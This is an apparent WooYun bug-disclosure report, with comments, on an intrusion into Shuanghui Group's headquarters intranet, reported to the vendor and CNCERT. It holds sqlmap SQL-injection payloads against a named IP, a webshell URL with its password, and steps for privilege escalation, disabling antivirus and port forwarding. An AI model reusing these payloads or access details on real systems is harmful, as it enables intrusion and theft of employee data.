当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120872

漏洞标题:我是如何漫游双汇集团总部内网的(涉及大量内部资料/实时视频监控/所有员工身份证号等)

相关厂商:双汇集团

漏洞作者: 超威蓝猫

提交时间:2015-06-16 15:06

修复时间:2015-08-05 08:02

公开时间:2015-08-05 08:02

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-16: 细节已通知厂商并且等待厂商处理中
2015-06-21: 厂商已经确认,细节仅向厂商公开
2015-07-01: 细节向核心白帽子及相关领域专家公开
2015-07-11: 细节向普通白帽子公开
2015-07-21: 细节向实习白帽子公开
2015-08-05: 细节向公众公开

简要描述:

荣获「食品安全终生成就奖」的企业对信息安全一点也不重视啊 ._.

详细说明:

早在今年一月,就有人报告了「双汇集团考勤管理系统未授权访问」这一漏洞(http://wooyun.org/bugs/wooyun-2010-094664),泄漏员工姓名与身份证号。这个漏洞依然没有修复,同时这也是本次入侵双汇集团位于河南漯河总部的入口。
wooyun-2010-094664 中提到,考勤管理系统登录页面 http://221.176.224.234/ 存在SQL注射:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: TextBox1 (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTc2OTQ2OTM4MQ9kFgICAw9kFgQCCQ8QDxYEHg1EYXRhVGV4dEZpZWxkBQJzah4LXyFEYXRhQm91bmRnZBAVNA/or7fpgInmi6nmnIjku70HMjAxNC0wOAcyMDE0LTExBzIwMTQtMDMHMjAxMS0wNgcyMDExLTA5BzIwMTUtMDEHMjAxNS0wMwcyMDEzLTA2BzIwMTQtMDUHMjAxMy0wOQcyMDExLTA1BzIwMTEtMTAHMjAxNC0wMQcyMDE1LTA1BzIwMTQtMTAHMjAxMy0xMAcyMDEyLTA1BzIwMTEtMDgHMjAxMy0wMwcyMDE0LTA2BzIwMTItMDEHMjAxNC0xMgcyMDEyLTAyBzIwMTItMTAHMjAxNS0wNgcyMDEzLTAyBzIwMTEtMTEHMjAxMi0wMwcyMDE0LTAyBzIwMTItMDgHMjAxMi0xMQcyMDEyLTEyBzIwMTUtMDIHMjAxMy0xMQcyMDEzLTA0BzIwMTEtMTIHMjAxMy0wNwcyMDEzLTAxBzIwMTUtMDQHMjAxMy0wOAcyMDEyLTA0BzIwMTMtMDUHMjAxMy0xMgcyMDE0LTA3BzIwMTQtMDkHMjAxNC0wNAcyMDEyLTA2BzIwMTEtMDQHMjAxMi0wNwcyMDExLTA3BzIwMTItMDkVNA/or7fpgInmi6nmnIjku70HMjAxNC0wOAcyMDE0LTExBzIwMTQtMDMHMjAxMS0wNgcyMDExLTA5BzIwMTUtMDEHMjAxNS0wMwcyMDEzLTA2BzIwMTQtMDUHMjAxMy0wOQcyMDExLTA1BzIwMTEtMTAHMjAxNC0wMQcyMDE1LTA1BzIwMTQtMTAHMjAxMy0xMAcyMDEyLTA1BzIwMTEtMDgHMjAxMy0wMwcyMDE0LTA2BzIwMTItMDEHMjAxNC0xMgcyMDEyLTAyBzIwMTItMTAHMjAxNS0wNgcyMDEzLTAyBzIwMTEtMTEHMjAxMi0wMwcyMDE0LTAyBzIwMTItMDgHMjAxMi0xMQcyMDEyLTEyBzIwMTUtMDIHMjAxMy0xMQcyMDEzLTA0BzIwMTEtMTIHMjAxMy0wNwcyMDEzLTAxBzIwMTUtMDQHMjAxMy0wOAcyMDEyLTA0BzIwMTMtMDUHMjAxMy0xMgcyMDE0LTA3BzIwMTQtMDkHMjAxNC0wNAcyMDEyLTA2BzIwMTEtMDQHMjAxMi0wNwcyMDExLTA3BzIwMTItMDkUKwM0Z2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAg0PPCsADQEADxYEHwFnHgtfIUl0ZW1Db3VudGZkZBgBBQlHcmlkVmlldzEPPCsACgEIZmSl3KpxbOgbM+nQ2IVReHAz9RY4UA==&TextBox1=a' AND 9450=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (9450=9450) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(122)+CHAR(112)+CHAR(113))) AND 'Ankx'='Ankx&TextBox2=6/5/2015&DropDownList1=%E8%AF%B7%E9%80%89%E6%8B%A9%E6%9C%88%E4%BB%BD&Button2=%E6%9F%A5%E8%AF%A2
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTc2OTQ2OTM4MQ9kFgICAw9kFgQCCQ8QDxYEHg1EYXRhVGV4dEZpZWxkBQJzah4LXyFEYXRhQm91bmRnZBAVNA/or7fpgInmi6nmnIjku70HMjAxNC0wOAcyMDE0LTExBzIwMTQtMDMHMjAxMS0wNgcyMDExLTA5BzIwMTUtMDEHMjAxNS0wMwcyMDEzLTA2BzIwMTQtMDUHMjAxMy0wOQcyMDExLTA1BzIwMTEtMTAHMjAxNC0wMQcyMDE1LTA1BzIwMTQtMTAHMjAxMy0xMAcyMDEyLTA1BzIwMTEtMDgHMjAxMy0wMwcyMDE0LTA2BzIwMTItMDEHMjAxNC0xMgcyMDEyLTAyBzIwMTItMTAHMjAxNS0wNgcyMDEzLTAyBzIwMTEtMTEHMjAxMi0wMwcyMDE0LTAyBzIwMTItMDgHMjAxMi0xMQcyMDEyLTEyBzIwMTUtMDIHMjAxMy0xMQcyMDEzLTA0BzIwMTEtMTIHMjAxMy0wNwcyMDEzLTAxBzIwMTUtMDQHMjAxMy0wOAcyMDEyLTA0BzIwMTMtMDUHMjAxMy0xMgcyMDE0LTA3BzIwMTQtMDkHMjAxNC0wNAcyMDEyLTA2BzIwMTEtMDQHMjAxMi0wNwcyMDExLTA3BzIwMTItMDkVNA/or7fpgInmi6nmnIjku70HMjAxNC0wOAcyMDE0LTExBzIwMTQtMDMHMjAxMS0wNgcyMDExLTA5BzIwMTUtMDEHMjAxNS0wMwcyMDEzLTA2BzIwMTQtMDUHMjAxMy0wOQcyMDExLTA1BzIwMTEtMTAHMjAxNC0wMQcyMDE1LTA1BzIwMTQtMTAHMjAxMy0xMAcyMDEyLTA1BzIwMTEtMDgHMjAxMy0wMwcyMDE0LTA2BzIwMTItMDEHMjAxNC0xMgcyMDEyLTAyBzIwMTItMTAHMjAxNS0wNgcyMDEzLTAyBzIwMTEtMTEHMjAxMi0wMwcyMDE0LTAyBzIwMTItMDgHMjAxMi0xMQcyMDEyLTEyBzIwMTUtMDIHMjAxMy0xMQcyMDEzLTA0BzIwMTEtMTIHMjAxMy0wNwcyMDEzLTAxBzIwMTUtMDQHMjAxMy0wOAcyMDEyLTA0BzIwMTMtMDUHMjAxMy0xMgcyMDE0LTA3BzIwMTQtMDkHMjAxNC0wNAcyMDEyLTA2BzIwMTEtMDQHMjAxMi0wNwcyMDExLTA3BzIwMTItMDkUKwM0Z2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAg0PPCsADQEADxYEHwFnHgtfIUl0ZW1Db3VudGZkZBgBBQlHcmlkVmlldzEPPCsACgEIZmSl3KpxbOgbM+nQ2IVReHAz9RY4UA==&TextBox1=a'; WAITFOR DELAY '0:0:5'--&TextBox2=6/5/2015&DropDownList1=%E8%AF%B7%E9%80%89%E6%8B%A9%E6%9C%88%E4%BB%BD&Button2=%E6%9F%A5%E8%AF%A2
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTc2OTQ2OTM4MQ9kFgICAw9kFgQCCQ8QDxYEHg1EYXRhVGV4dEZpZWxkBQJzah4LXyFEYXRhQm91bmRnZBAVNA/or7fpgInmi6nmnIjku70HMjAxNC0wOAcyMDE0LTExBzIwMTQtMDMHMjAxMS0wNgcyMDExLTA5BzIwMTUtMDEHMjAxNS0wMwcyMDEzLTA2BzIwMTQtMDUHMjAxMy0wOQcyMDExLTA1BzIwMTEtMTAHMjAxNC0wMQcyMDE1LTA1BzIwMTQtMTAHMjAxMy0xMAcyMDEyLTA1BzIwMTEtMDgHMjAxMy0wMwcyMDE0LTA2BzIwMTItMDEHMjAxNC0xMgcyMDEyLTAyBzIwMTItMTAHMjAxNS0wNgcyMDEzLTAyBzIwMTEtMTEHMjAxMi0wMwcyMDE0LTAyBzIwMTItMDgHMjAxMi0xMQcyMDEyLTEyBzIwMTUtMDIHMjAxMy0xMQcyMDEzLTA0BzIwMTEtMTIHMjAxMy0wNwcyMDEzLTAxBzIwMTUtMDQHMjAxMy0wOAcyMDEyLTA0BzIwMTMtMDUHMjAxMy0xMgcyMDE0LTA3BzIwMTQtMDkHMjAxNC0wNAcyMDEyLTA2BzIwMTEtMDQHMjAxMi0wNwcyMDExLTA3BzIwMTItMDkVNA/or7fpgInmi6nmnIjku70HMjAxNC0wOAcyMDE0LTExBzIwMTQtMDMHMjAxMS0wNgcyMDExLTA5BzIwMTUtMDEHMjAxNS0wMwcyMDEzLTA2BzIwMTQtMDUHMjAxMy0wOQcyMDExLTA1BzIwMTEtMTAHMjAxNC0wMQcyMDE1LTA1BzIwMTQtMTAHMjAxMy0xMAcyMDEyLTA1BzIwMTEtMDgHMjAxMy0wMwcyMDE0LTA2BzIwMTItMDEHMjAxNC0xMgcyMDEyLTAyBzIwMTItMTAHMjAxNS0wNgcyMDEzLTAyBzIwMTEtMTEHMjAxMi0wMwcyMDE0LTAyBzIwMTItMDgHMjAxMi0xMQcyMDEyLTEyBzIwMTUtMDIHMjAxMy0xMQcyMDEzLTA0BzIwMTEtMTIHMjAxMy0wNwcyMDEzLTAxBzIwMTUtMDQHMjAxMy0wOAcyMDEyLTA0BzIwMTMtMDUHMjAxMy0xMgcyMDE0LTA3BzIwMTQtMDkHMjAxNC0wNAcyMDEyLTA2BzIwMTEtMDQHMjAxMi0wNwcyMDExLTA3BzIwMTItMDkUKwM0Z2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAg0PPCsADQEADxYEHwFnHgtfIUl0ZW1Db3VudGZkZBgBBQlHcmlkVmlldzEPPCsACgEIZmSl3KpxbOgbM+nQ2IVReHAz9RY4UA==&TextBox1=a' WAITFOR DELAY '0:0:5'--&TextBox2=6/5/2015&DropDownList1=%E8%AF%B7%E9%80%89%E6%8B%A9%E6%9C%88%E4%BB%BD&Button2=%E6%9F%A5%E8%AF%A2
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
current user is DBA:    True
available databases [7]:
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] sygs
[*] sygsaa
[*] tempdb


找到物理路径之后写入webshell:

sshot-2015-06-16-[2].png


得到:http://221.176.224.234/indexbak.aspx 密码-7
这台服务器上有功能残缺的360,但ms11-080和ms11-046等漏洞未修补,可提权。提权后干掉直接360(360在win2003表现不怎样),lcx反射端口,连接远程桌面。

sshot-2015-06-16-[3].png


sshot-2015-06-16-[4].png


扫描下常用端口

mask 区域 
*****.0.1*****
*****.0.7*****
*****.0.1*****
*****.100:*****
*****.100:*****
*****.101:*****
*****.102:*****
*****.103:*****
*****.166:*****
*****.180:*****
*****.181:*****
*****.181:*****
*****.182:*****
*****.185:*****
*****.185:*****
*****.182:*****
*****.186:*****
*****.186:*****
*****.184:*****
*****.184:*****
*****.183:*****
*****.183:*****
*****.210:*****
*****.210:*****
*****.210:*****
*****.210:*****
*****.245:*****
*****.245:*****
*****.245:*****
*****.249:*****
*****.249:*****
*****.247:*****
*****.247:*****
*****.0.2*****


大致摸清了双汇总部内网结构:

sshot-2015-06-16-[6].png


sshot-2015-06-16-[5].png


sshot-2015-06-16-[7].png


sshot-2015-06-16-[8].png


共享文件太多了,屏幕太小截一部分吧

sshot-2015-06-16-[9].png

漏洞证明:

如上。

修复方案:

sshot-2015-06-16-[1].png

版权声明:转载请注明来源 超威蓝猫@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-06-21 08:00

厂商回复:

cnvd确认并复现所述情况,已经由cnvd通过网站管理单位公开联系渠道向其邮件通报。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-06-16 15:07 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    这个影响太大了,看cert能一起帮忙联系企业修复

  2. 2015-06-16 15:08 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    @疯狗 双汇 归国家管?

  3. 2015-06-16 15:09 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    荣获「食品安全终生成就奖」的企业对信息安全一点也不重视啊 ._.

  4. 2015-06-16 15:13 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @’‘Nome 之前联系未果,太传统的企业,cert兴许能帮忙联系到相关负责人

  5. 2015-06-21 09:24 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @疯狗 双汇,阿萨姆,红牛,可口可乐,农夫山泉都没人管安全问题,国内居前列的都是知名品牌阿

  6. 2015-06-21 10:04 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    http://www.shuanghui.net/shsk/spider%20Php%20shell.php 站出来,双汇保证不打屎你-。-

  7. 2015-06-21 10:53 | ’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)

    @小龙 这是你的shell么?

  8. 2015-06-21 11:00 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @’‘Nome 应该是洞主的吧,我google到的

  9. 2015-07-13 16:18 | 超威蓝猫 ( 核心白帽子 | Rank:1092 漏洞数:117 | STEAM_0:0:55968383)

    @小龙 并不是。

  10. 2015-08-05 08:40 | BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效,坚持好的习惯千万不要放弃)

    内网系统并没有拿下什么啊

  11. 2015-08-05 23:53 | 金馆长 ( 路人 | Rank:0 漏洞数:1 | Up)

    我有知识我自豪!